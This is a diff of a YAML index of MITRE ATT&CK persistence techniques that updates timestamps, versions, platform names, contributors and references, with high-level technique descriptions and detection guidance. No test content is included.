-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -35277,7 +35679,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -35307,12 +35709,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -35402,12 +35802,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -35492,7 +35891,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -35557,18 +35955,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -35601,10 +35998,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -35641,7 +36037,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -35715,7 +36110,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -35743,12 +36138,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -35807,33 +36201,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35854,6 +36225,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -35868,52 +36240,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -35935,6 +36297,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -35945,23 +36308,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35978,7 +36368,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -36037,7 +36427,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -36119,7 +36508,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -36234,12 +36622,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -36262,16 +36649,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -36298,7 +36684,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -36367,7 +36752,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -36403,7 +36787,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -36422,12 +36806,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -36477,12 +36860,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -36515,9 +36897,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -36534,9 +36917,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -36582,12 +36964,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -36601,7 +36982,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -36660,7 +37041,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -36686,7 +37066,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -36712,13 +37092,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -36742,8 +37120,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -36773,7 +37151,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -36816,7 +37193,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36841,12 +37218,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36886,8 +37262,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -36895,13 +37273,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -36932,17 +37310,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -37005,7 +37380,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -37039,8 +37414,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -37049,6 +37424,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -37061,12 +37440,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -37079,6 +37457,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -37115,17 +37494,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
